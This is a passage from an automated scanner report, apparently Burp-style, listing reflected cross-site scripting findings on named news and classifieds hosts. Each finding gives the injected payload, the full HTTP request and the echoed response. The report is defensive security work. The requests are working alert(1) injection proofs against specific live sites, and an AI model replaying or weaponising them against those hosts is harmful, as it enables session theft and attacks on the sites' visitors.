<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325299e97<a>0a8fa2f50b9/RatingService.asmx" />
...[SNIP]...

1.34. http://rt.sitebrand.com/main.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 60647<script>alert(1)</script>0bdac1d23ec was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.php?callback=jsonp129080571861560647<script>alert(1)</script>0bdac1d23ec&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:22:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 261
Connection: keep-alive

jsonp129080571861560647<script>alert(1)</script>0bdac1d23ec({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"ae6dc541-95fd-4c05-a149-b5fe5b4b6039","persist":{"fvt":"1289172835","vn":3,"sst":1290802970,"spt":1290802970,"spd":1,"npv":6,"sur":""},"data":{}})
...[SNIP]...

1.35. http://rt.sitebrand.com/main.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9cd22<img%20src%3da%20onerror%3dalert(1)>b0820e9530 was submitted in the cid parameter. This input was echoed as 9cd22<img src=a onerror=alert(1)>b0820e9530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805718615&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce9cd22<img%20src%3da%20onerror%3dalert(1)>b0820e9530&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 263
Connection: keep-alive

jsonp1290805718615({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce9cd22<img src=a onerror=alert(1)>b0820e9530","sid":"70732e8e-f026-43df-8e51-821758492567","persist":{"fvt":"1289172835","vn":3,"sst":1290802991,"spt":1290802991,"spd":1,"npv":6,"sur":""},"data":{}})

1.36. http://rt.sitebrand.com/main.php [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the sid request parameter is copied into the HTML document as plain text between tags. The payload f3eea<img%20src%3da%20onerror%3dalert(1)>13fa3e6a01 was submitted in the sid parameter. This input was echoed as f3eea<img src=a onerror=alert(1)>13fa3e6a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805808871&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2Fhomedelivery%2Fsignup.htm&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=homedelivery1&sid=c17ed75e-d5a1-4ad1-a683-d7c3460dd23ff3eea<img%20src%3da%20onerror%3dalert(1)>13fa3e6a01&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=3&sst=1290802578&spt=1290802578&spd=1&npv=6&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/homedelivery/signup.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 267
Connection: keep-alive

jsonp1290805808871({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"c17ed75e-d5a1-4ad1-a683-d7c3460dd23ff3eea<img src=a onerror=alert(1)>13fa3e6a01","persist":{"fvt":"1289172835","vn":"3","sst":"1290802578","spt":1290802983,"spd":2,"npv":7,"sur":""},"data":{}})

1.37. http://rt.sitebrand.com/main.php [sur parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the sur request parameter is copied into the HTML document as plain text between tags. The payload 47524<img%20src%3da%20onerror%3dalert(1)>7c23df00654 was submitted in the sur parameter. This input was echoed as 47524<img src=a onerror=alert(1)>7c23df00654 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805808871&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2Fhomedelivery%2Fsignup.htm&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=homedelivery1&sid=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=3&sst=1290802578&spt=1290802578&spd=1&npv=6&sur=47524<img%20src%3da%20onerror%3dalert(1)>7c23df00654&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/homedelivery/signup.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 268
Connection: keep-alive

jsonp1290805808871({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"c17ed75e-d5a1-4ad1-a683-d7c3460dd23f","persist":{"fvt":"1289172835","vn":"3","sst":"1290802578","spt":1290803003,"spd":2,"npv":7,"sur":"47524<img src=a onerror=alert(1)>7c23df00654"},"data":{}})

1.38. http://rt.sitebrand.com/main.php [ur parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt.sitebrand.com
Path:   /main.php

Issue detail

The value of the ur request parameter is copied into the HTML document as plain text between tags. The payload 15bb2<img%20src%3da%20onerror%3dalert(1)>72efd0729ca was submitted in the ur parameter. This input was echoed as 15bb2<img src=a onerror=alert(1)>72efd0729ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /main.php?callback=jsonp1290805718615&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=15bb2<img%20src%3da%20onerror%3dalert(1)>72efd0729ca&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1
Host: rt.sitebrand.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Fri, 26 Nov 2010 20:23:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 264
Connection: keep-alive

jsonp1290805718615({"cid":"f6b8beab-5e25-44e0-96ff-6a65205e33ce","sid":"a65a8069-a5d0-407c-95e3-779a21c1ef47","persist":{"fvt":"1289172835","vn":3,"sst":1290802981,"spt":1290802981,"spd":1,"npv":6,"sur":"15bb2<img src=a onerror=alert(1)>72efd0729ca"},"data":{}})

1.39. http://stats.nypost.com/cfb/scoreboards.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /cfb/scoreboards.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8145e"><script>alert(1)</script>2082e2a3405 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cfb/scoreboards.asp?8145e"><script>alert(1)</script>2082e2a3405=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=9
Date: Fri, 26 Nov 2010 20:24:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="60;URL=/cfb/scoreboard.asp?8145e"><script>alert(1)</script>2082e2a3405=1">
...[SNIP]...

1.40. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75afa"><script>alert(1)</script>d0a3c5ea0b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?75afa"><script>alert(1)</script>d0a3c5ea0b9=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?75afa"><script>alert(1)</script>d0a3c5ea0b9=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.41. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /mlb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5ab"><script>alert(1)</script>526647f750e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/scoreboard.asp?3f5ab"><script>alert(1)</script>526647f750e=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:54 GMT
Content-Length: 30704
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/mlb/scoreboard.asp?3f5ab"><script>alert(1)</script>526647f750e=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.42. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nba/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553e8"><script>alert(1)</script>c2e5b656e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nba/scoreboard.asp?553e8"><script>alert(1)</script>c2e5b656e86=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nba/scoreboard.asp?553e8"><script>alert(1)</script>c2e5b656e86=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.43. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nhl/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bfd5"><script>alert(1)</script>3783214829f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nhl/scoreboard.asp?3bfd5"><script>alert(1)</script>3783214829f=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Fri, 26 Nov 2010 20:23:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nhl/scoreboard.asp?3bfd5"><script>alert(1)</script>3783214829f=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.44. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fe6c"-alert(1)-"e45e0a85c9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seller9fe6c"-alert(1)-"e45e0a85c9d/1357873/ HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:27 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=e17d46f4cace52de2f1a7a154b5c560b; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=17b1569672d8377c490c56bedaae484b; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1ENUM3OTU0NjRDRjAxNzdC; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds seller9fe6c"-alert(1)-"e45e0a85c9d/1357873/","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.45. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a8a"><script>alert(1)</script>0bc6ba7292 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /seller90a8a"><script>alert(1)</script>0bc6ba7292/1357873/ HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=6314450fea101b2308e655bdcc8c4b38; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ec0c13ddb0a6e63abdaf0ce42fe905ac; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1COUFFRTIwMDRDRjAxNzdB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/seller90a8a"><script>alert(1)</script>0bc6ba7292/1357873/" />
...[SNIP]...

1.46. http://usa.classifieds.nypost.com/seller/1357873/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eae4f"-alert(1)-"6ea7d1d3e5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seller/1357873eae4f"-alert(1)-"6ea7d1d3e5a/ HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=698ca94c019131a34e7cc89d01cedc8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=24780bb1a0dc2a3d57753a934237e825; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FNEU4RkJGQTRDRjAxNzgw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA3Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_-seller-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "usa-_-seller-_-seller-_--_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("seller 1357873eae4f"-alert(1)-"6ea7d1d3e5a/","10000064","","","usa-_-seller-_-seller-_-nypost USA-_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.47. http://usa.classifieds.nypost.com/seller/1357873/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.classifieds.nypost.com
Path:   /seller/1357873/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a75"-alert(1)-"24fbe44fe7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seller/1357873/?78a75"-alert(1)-"24fbe44fe7d=1 HTTP/1.1
Host: usa.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=2b2a1e79ed0636d22bed1acb464ba6e8; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=ff824e33ae4b4bf1d16c43bab1fafcdd; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FNEQ3Qzk5QzRDRjAxNzc4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA2NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
seller-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "usa-_-seller-_-seller-_--_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("seller 1357873/?78a75"-alert(1)-"24fbe44fe7d=1","10000064","","","usa-_-seller-_-seller-_-nypost USA-_-nypost-_-USA-_-nypost-_-seller-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.48. http://redcated/8GF/iview/273499083/direct/01/4055590 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4055590

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c209'%3bd57c61ac63f was submitted in the REST URL parameter 4. This input was echoed as 4c209';d57c61ac63f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

